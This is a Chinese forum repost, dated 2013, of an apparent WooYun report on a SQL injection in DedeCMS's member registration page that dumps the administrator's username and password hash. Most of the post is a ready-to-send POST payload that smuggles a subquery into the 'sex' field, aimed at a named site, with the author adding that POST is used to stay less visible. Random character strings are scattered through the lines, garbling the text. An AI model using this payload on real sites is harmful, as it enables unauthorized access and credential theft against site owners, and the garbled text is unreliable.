漏洞类型: SQL注射漏洞5 T9 S6 ^) h2 s& C8 u/ E; |
简要描述: P" O+ l- x! m' b
; u! s2 m# n6 W, _! d4 X
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
/ K2 B Q! Y! y2 F3 i* f( d原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.1 w' }# Z2 V5 _% c4 G& u
详细说明:跟这个漏洞
9 \3 f R6 b/ F/ Q7 h * x) e' {: {8 }$ V5 c6 y
WooYun: Dedecms SQL注射导致审核机制绕过漏洞8 r4 z7 p# Q: w: V7 I, z
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.% F. R( S' S- o" E J
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
g- J) v) s( ] + C) S9 f* K3 `8 B$ y) s
www.political-security.com/member/reg_new.php6 u$ e, n) r7 {# L* r% s
% P# ?7 b/ H( i- D- MPOST
2 R# t, {$ y7 {2 L* F' n# N8 `% \& h
* j: p& W8 L, D% Cdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
! g/ U5 a* g0 | ?7 }userid=c4rp3nt3r&uname=c4rp3nt3r
# e1 W* |8 R0 d# i5 ~* a2 j&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss0 p. v8 m2 t+ g
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
4 E e6 f4 ] i) j2 \(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
, [9 ^% U1 g" J0 O* g$ j%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对